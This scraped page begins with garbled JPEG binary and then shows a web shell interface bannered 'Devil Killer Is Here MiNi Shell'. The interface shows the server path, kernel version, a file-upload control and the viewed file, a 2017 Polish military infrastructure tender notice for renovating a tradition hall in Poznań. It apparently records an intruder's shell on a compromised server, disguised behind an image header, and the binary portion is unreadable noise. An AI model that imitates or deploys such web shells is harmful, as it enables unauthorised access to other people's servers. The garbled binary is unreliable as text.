JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170407/61269-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 61269 - 2017
              z dnia 2017-04-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Poznań: Remont budynku nr 15 sala tradycji zgrupowania JW Poznań Kościuszki 92/98<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojskowy Zarząd Infrastruktury w Poznaniu, krajowy numer identyfikacyjny
              63015300300000, ul.
              ul. Kościuszki 
              ,
              60967  
              Poznań, woj.
              wielkopolskie, państwo
              Polska, tel.
              618 573 323, e-mail
              kszp@wzipoznan.pl, faks
              061 8572727, 8572489.
              <br />
              Adres strony internetowej (URL): www.wzipoznan.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Budżetowa MON</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą lub pocztą kurierską w formie papierowej<br />
                Adres:
                <br />Wojskowy Zarząd Infrastruktury, ul Kościuszki 92/98, 61-716 Poznań (skrytka pocztowa)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont budynku nr 15 sala tradycji zgrupowania JW Poznań Kościuszki 92/98<br /><b>Numer referencyjny: </b>22/ZI/1/WB<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Remont budynku nr 15  sala tradycji zgrupowanie Jednostek Wojskowych Poznań-Kościuszki przy ul. Kościuszki 92/98 w Poznaniu
Budynek zlokalizowany jest na terenie Kompleksu Wojskowego nr K-2744 w Poznaniu przy ul. Kościuszki 92/98 stanowiącym teren zamknięty.
Kategoria obiektu budowlanego - XII
Celem zadania jest dostosowanie budynku pod względem technicznym i eksploatacyjnym do
wymogów stawianych przez Użytkownika, w zakresie określonym opisem przedmiotu
zamówienia.
Po wykonaniu robót budynek ma osiągnąć pełną sprawność techniczną i eksploatacyjną,
ze szczególnym uwzględnieniem bezpieczeństwa użytkowania.
W zakresie niniejszego zadania wykonane będą tylko wytypowane elementy, zaliczane do zadań remontowych.

UWAGA:
Zakres prac objęty niniejszym zadaniem ogranicza się do prac remontowych, wytypowanych do wykonania z założeniem możliwości pełnowartościowego technicznie korzystania 
z obiektu po przeprowadzeniu remontu. Zakres projektowanych robót nie zmienia podstawowych parametrów budynku: Pz i V.
Zasadnicza funkcja budynku nie ulega zmianie. Po remoncie budynek będzie funkcjonował jako izba tradycji, w użytkowaniu Sekcji Wychowania.
Szczegółowy zakres robót określony niniejszym opracowaniem obejmuje:
A. roboty zewnętrzne  uzbrojenie i zagospodarowanie terenu
- drenaż opaskowy + studnie inspekcyjne + studnie zbiorcze
- wyburzenie dwóch studzienek kanalizacji deszczowej (60x60cm) wzdłuż elewacji
  zachodniej
- fragmenty kanalizacji deszczowej odwodnienia dachu  w tym 4 studzienki kompletne
  500 i podłączenie do kanalizacji ogólnospławnej
- opaska instalacji odgromowej (w wykopie robót ociepleniowych, izolacyjnych ścian
   i robót instalacyjnych)
- wykonanie przyłącza wody 65 z budynku nr 3
- ułożenie (przy wodociągu) 2x RPP 110x6,0mm
- montaż stopnic po oczyszczeniu i wykonaniu krawędziowych rowków
   przeciwpoślizgowych (min. 2 rowki)
- montaż płyt granitowych podestu (po oczyszczeniu) wraz z budową odwodnienia
   liniowego i jego podłączeniem do istniejącej kanalizacji deszczowej
-  czyszczenie elewacji ścian oporowych przy wejściu do budynku - czyszczenie
    mechaniczne (metodą suchą) okładziny marmurowej ścian oporowych frontowych
-  remont donic przy lewej ścianie oporowej - wymurowanie zdemontowanej okładziny
    (łupanka) marmurowej, donic na schodach zewnętrznych, oczyszczenie mechaniczne
-   przebudowa zewnętrznego wyjścia ewakuacyjnego na elewacji północnej, wraz ze
     schodami w kierunku budynku nr 3
- budowa zadaszenia nad wyjściem ewakuacyjnym  konstrukcja stalowa + szklenie
- wykonanie i montaż balustrad: na ścianach oporowych wydzielających zejście do budynku
   2 szt., na schodach głównych  3 szt.
- wykonanie i montaż pochwytu ściennego przy schodach ewakuacyjnych
- wykonanie i montaż furtki samozamykającej przy zejściu do schodów ewakuacyjnych
- demontaż fragmentu ogrodzenia stalowego przy północno zachodnim narożniku budynku
- wykonanie ogrodzenia (zabezpieczenie części górnej i dolnej budynku) na północnym
   szczycie budynku ogrodzenia stalowego
- wykonanie murków oporowych przy wyjściu ewakuacyjnym w rejonie drogi przy budynku
   nr 3
- wycinka wskazanych drzew i krzewów destrukcyjnie wpływających na konstrukcję
   budynku
-  remont-odtworzenie i uzupełnienie chodników opaskowych
-  roboty porządkowe w terenie, szczególnie po robotach wykonania drenaży
B. roboty zewnętrzne  roboty na budynku
-  wykonanie nowej elewacji wentylowanej z ociepleniem i okładziną kamienną z piaskowca
    łupanego (łupanka)
-  wykonanie rur spustowych odwodnienia dachu
-  wykonanie izolacji przeciwwodnej i termicznej ścian podziemnych (po osuszeniu ścian)
-  remont dachu budynku i jego izolacji przeciwwodnej i termicznej
-  remont dekoracyjnych masztów
-  wykonanie instalacji odgromowej masztów
C. roboty remontowo-budowlane budynku
- remont ścian wewnętrznych wraz z osuszaniem i wykonaniem iniekcji krzemianowej dla
   uzyskania izolacji poziomej ściany konstrukcyjnej
-  przebudowa węzłów sanitarnych
-  remont sufitów istniejących i montaż sufitów podwieszonych z poprawą akustyki
-  remont (wymiana) posadzek kamiennych i schodów wewnętrznych
-  wymiana ściany fasadowej przeszklonej z drzwiami oraz ścianki wewnętrznej
    przeszklonej z drzwiami, wymiana drzwi ewakuacyjnych
-  wymiana i zabudowa drzwi wewnętrznych do węzłów sanitarnych i szatni
-  wykonanie robót budowlanych związanych z prowadzonym remontem, jak tynki,
   wyprawy tynkarskie, okładziny, sufity podwieszone itp. (w tym tynki i posadzki po
    robotach instalacyjnych elektrycznych, c.o. i wod.-kan.) oraz malowania pomieszczeń,
    wykonanie wymaganych oblicowań.
-  remont zużytej instalacji centralnego ogrzewania
-  remont instalacji elektrycznej z tablicami i przyłączem - remont instalacji: oświetlenia
    ogólnego, awaryjnego i ewakuacyjnego, oświetlenia liniowego eksponatów, oświetlenia
   zewnętrznego na budynku (gniazdo hermetyczne 230V), gniazd 230V w wytypowanych
   pomieszczeniach, wewnętrznych linii zasilających wraz tablicami rozdzielczymi, ochrony
   od porażeń, przeciwprzepięciowej, połączeń wyrównawczych, instalacji odgromowej itp.
-  remont instalacji wod-kan dla węzłów sanitarnych
-  wykonanie instalacji wentylacji mechanicznej
-  wykonanie instalacji wewnętrznej ppoż i alarmowej
Wykonawca zobowiązany jest do wykonania prac związanych z usuwaniem drzew i krzewów zgodnie z ustawą z dnia 2004r o ochronie przyrody (Dz.U.2016.2134 z późn. zm.), Rozporządzeniem Ministra Środowiska z dnia 6 października 2014r w sprawie ochrony gatunkowej zwierząt (Dz.U.2016.2183) oraz  Rozporządzeniem Ministra Środowiska z dnia 9 października 2014r w sprawie ochrony  gatunkowej roślin (Dz.U.2014.1409), w szczególności:
- usunięcia drzew i krzewów, na których występują gniazda ptasie  w okresie od dnia 16 października do końca lutego  podstawa prawna: § 9 pkt 2 Rozporządzenia Ministra Środowiska z dnia 6 października 2014r w sprawie ochrony gatunkowej zwierząt (Dz.U.2016.2183);
- usunięcia drzew i krzewów na których stwierdzone zostaną chronione gatunki roślin, zwierząt i grzybów lub miejsca gniazdowania ptaków gatunków chronionych  po uzyskaniu stosownego zezwolenia na odstępstwa od zakazów związanych z ich ochroną. Zezwolenie takie, zgodnie z art. 56 ust. 1 i 2 Ustawy z dnia 16 kwietnia 2004r o ochronie przyrody (Dz.U.2016.2134 z późn. zm.) może wydać odpowiednio Generalny Dyrektor Ochrony Środowiska lub Regionalny Dyrektor Ochrony Środowiska. 
Zamawiający wymaga udzielenia gwarancji i rękojmi na oferowany przedmiot na okres minimum 48 miesięcy licząc od dnia odbioru końcowego robót. Bieg i termin gwarancji 
i rękojmi rozpoczyna się w dniu następnym po odbiorze końcowym robót.
<br /><br /><b>II.5) Główny kod CPV: </b>45453000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              2460774.93<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień o których mowa w at. 67 ust 1 pkt 6 w nawiązaniu o art. 144 ust  pkt 6 ustawy Pzp.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 210<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie spełniania ww. warunku Wykonawcy wykażą, że spełniają wymogi ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (Dz. U. 2016.1167) 
w zakresie ochrony informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE, w tym:
- zatrudnia pełnomocnika ds. ochrony informacji niejawnych,
- zatrudnia przeszkolonego przez ABW lub SKW administratora niejawnego systemu 
  teleinformatycznego,
- zatrudnia przeszkolonego przez ABW lub SKW inspektora bezpieczeństwa 
  teleinformatycznego,
- posiada obsługę kancelaryjną dokumentów o klauzuli ZASTRZEŻONE.
Pracownicy przewidziani do realizacji zamówienia muszą posiadać poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE (lub pisemne upoważnienie Kierownika Jednostki Organizacyjnej do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE) i zaświadczenie stwierdzające odbycie szkolenia w zakresie informacji niejawnych.
Geodeta musi posiadać poświadczenie bezpieczeństwa do klauzuli ZASTRZEŻONE (lub pisemne upoważnienie Kierownika Jednostki Organizacyjnej do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE) i zaświadczenie stwierdzające odbycie szkolenia w zakresie informacji niejawnych.
W przypadku realizacji prac geodezyjnych przez Wykonawcę  członka konsorcjum firm, musi on wykazać, że spełnia wymogi ustawy o ochronie informacji niejawnych 
z dnia 5 sierpnia 2010 r. (Dz. U. Nr 182, poz. 1228) w zakresie ochrony informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE, w tym:
- zatrudnia pełnomocnika ds. ochrony informacji niejawnych,
- zatrudnia przeszkolonego przez ABW lub SKW administratora niejawnego systemu 
  teleinformatycznego,
- zatrudnia przeszkolonego przez ABW lub SKW inspektora bezpieczeństwa 
  teleinformatycznego,
- posiada obsługę kancelaryjną dokumentów o klauzuli ZASTRZEŻONE,
- pracownicy przewidziani do realizacji zadania posiadają poświadczenie bezpieczeństwa do 
  klauzuli ZASTRZEŻONE (lub pisemne upoważnienie Kierownika Jednostki Organizacyjnej do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE) 
i zaświadczenie stwierdzające odbycie szkolenia w zakresie informacji niejawnych.
b) Wykonawca spełnia wymogi Ustawy o odpadach z dnia 14.12.2012r w zakresie wytwarzania i transportu odpadów (Dz. U. z 2013r poz. nr 21)
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny na etapie składania wniosków.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                         Wykonawca spełni warunek jeżeli wykaże, że:
         -  w okresie ostatnich  5 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy  w tym okresie zrealizował budowę, przebudowę lub remont obiektu w zakresie konstrukcji, robót elektrycznych, robót sanitarnych oraz teletechnicznych o wartości minimum 1 000 000,00 zł .
dysponuje:
        -  osobami zdolnymi do wykonania niniejszego zamówienia, a mianowicie posiadających uprawnienia budowlane bez ograniczeń w rozumieniu ustawy z dnia 07.07.1994r.  Prawo budowalne. (Dz. U.z 2016r. poz. 290 z zm.) lub odpowiadające im uprawnienia budowlane na podstawie wcześniej obowiązujących przepisów albo uprawnionych do sprawowania samodzielnej funkcji, na podstawie odrębnych przepisów prawa tj:  
a) osoba do kierowania i nadzorowania w specjalności konstrukcyjno  budowlanej (kierownik budowy),
b) osoba do kierowania i nadzorowania w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń telekomunikacyjnych (kierownik robót teletechnicznych),
c)	osobą do kierowania i nadzorowania w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (kierownik robót elektrycznych),
d)	osoba z uprawnieniami budowlanymi wykonawczymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (kierownik robót sanitarnych)
Wyżej wymienione osoby muszą na dzień składania wniosków oraz na cały czas trwania realizacji zamówienia przynależeć do Samorządu Zawodowego.
-         a także osoby:
z uprawnieniami do montażu systemów alarmowych i kontroli dostępu,  zaświadczeniem komendanta Wojewódzkiego Policji o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego oraz ukończonym kursem montażu tych systemów dla klas SA4 (osoba wykonująca montaż SSWiN).
Geodetę z uprawnieniami w zakresie: geodezyjne pomiary sytuacyjno  wysokościowe, realizacyjne i inwentaryzacyjne.
Pracownicy skierowani przez Wykonawcę do realizacji zamówienia publicznego muszą posiadać poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą tajności ZASTRZEŻONE lub pisemną zgodę Kierownika Jednostki Organizacyjnej oraz  zaświadczenie stwierdzające odbycie przeszkolenia w zakresie ochrony informacji niejawnych.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Warunki wymagane od Wykonawców sprawdzane będą na podstawie złożonych
we wniosku dokumentów i oświadczeń.
Przy dokonywaniu oceny spełnienia warunków zamawiający będzie się kierował zasadą: spełnienia lub niespełnienia. Nie może być żadnego stanu pośredniego, co oznacza, 
że warunek spełniony częściowo będzie oceniony jako niespełniony. Wykonawca musi spełnić wszystkie warunki wymagane przez Zamawiającego
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji,  w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />aktualne na dzień składania wniosków o dopuszczenie do udziału 
w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 2 
do Ogłoszenia 

wykaz wykonanych zamówień + dowody określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego 
i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty - załącznik nr 6 do Ogłoszenia

Wykonawca nie ma obowiązku przedstawiania dowodów, o których mowa w zdaniu poprzednim, w stosunku do robót budowlanych wykonanych na rzecz Zamawiającego.
	
Wykaz, o którym mowa powyżej posłuży Zamawiającemu do oceny spełnienia kryteriów selekcji.
